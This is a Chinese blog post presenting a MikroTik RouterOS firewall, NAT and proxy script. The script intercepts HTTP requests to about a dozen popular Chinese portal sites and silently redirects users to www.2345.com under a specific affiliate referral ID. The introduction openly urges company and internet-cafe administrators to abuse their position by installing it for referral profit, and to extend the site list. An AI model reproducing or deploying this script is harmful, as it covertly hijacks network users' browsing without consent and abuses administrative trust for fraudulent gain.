ros做url跳转到2345推广脚本

Linux就该这么学

 相信大家都知道2345的推广吧,所以在企业或者网吧里就可以利用职务之便,整个这个脚本上去,当然还有很多没有添加上去,大家自己去进行修改吧.

 

脚本内容:

 
/ip firewall filter
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward comment=\
    "\B8\FC\B6\E0\CD\F8\D7\AC\BC\D3QQ\C8\BA:2850566" content=\
    "Host: www.hao123.com" disabled=no dst-port=80 protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: hao123.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: hao.360.cn" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: tao123.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: www.tao123.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: 2012.hao.qq.com" disabled=no dst-port=\
    80 protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: i.firefoxchina.cn" disabled=no \
    dst-port=80 protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: www.265.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: www.256.cc" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: hao.163.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: hao.qq.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: 123.sogou.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: 123.duba.net" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: www.114la.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: 114la.com" disabled=no dst-port=80 \
    protocol=tcp
add action=add-dst-to-address-list address-list=tall address-list-timeout=\
    2w1d chain=forward content="Host: 123.duba.net" disabled=no dst-port=80 \
    protocol=tcp


/ip firewall nat
add action=redirect chain=dstnat comment=\
    "\B8\FC\B6\E0\CD\F8\D7\AC\BC\D3QQ\C8\BA:2850566" disabled=no \
    dst-address-list=tall dst-port=80 protocol=tcp src-address-list=!butiao \
    to-ports=9999

/ip proxy
set always-from-cache=no cache-administrator=webmaster cache-hit-dscp=4 \
    cache-on-disk=no enabled=yes max-cache-size=none max-client-connections=\
    2600 max-fresh-time=3d max-server-connections=2600 parent-proxy=0.0.0.0 \
    parent-proxy-port=0 port=9797,9999 serialize-connections=no src-address=\
    0.0.0.0
/ip proxy access
add action=deny comment="\B8\FC\B6\E0\CD\F8\D7\AC\BC\D3QQ\C8\BA:2850566" \
    disabled=no dst-host=www.hao123.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=hao123.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=hao.360.cn dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=www.tao123.com dst-port="" local-port=\
    9999 redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=tao123.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=123.duba.net dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=www.114la.com dst-port="" local-port=\
    9999 redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=114la.com dst-port="" local-port=\
    9999 redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=123.sogou.com dst-port="" local-port=\
    9999 redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=123.duba.net dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=hao.qq.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=hao.163.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=www.256.cc dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=www.265.com dst-port="" local-port=9999 \
    redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=2012.hao.qq.com dst-port="" local-port=\
    9999 redirect-to="www.2345.com/\?k74008084 "
add action=deny disabled=no dst-host=i.firefoxchina.cn dst-port="" \
    local-port=9999 redirect-to="www.2345.com/\?k74008084 "

本文由 CentOS中文站 - 专注Linux技术 作者:centos 发表,其版权均为 CentOS中文站 - 专注Linux技术 所有,文章内容系作者个人观点,不代表 CentOS中文站 - 专注Linux技术 对观点赞同或支持。如需转载,请注明文章来源。

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注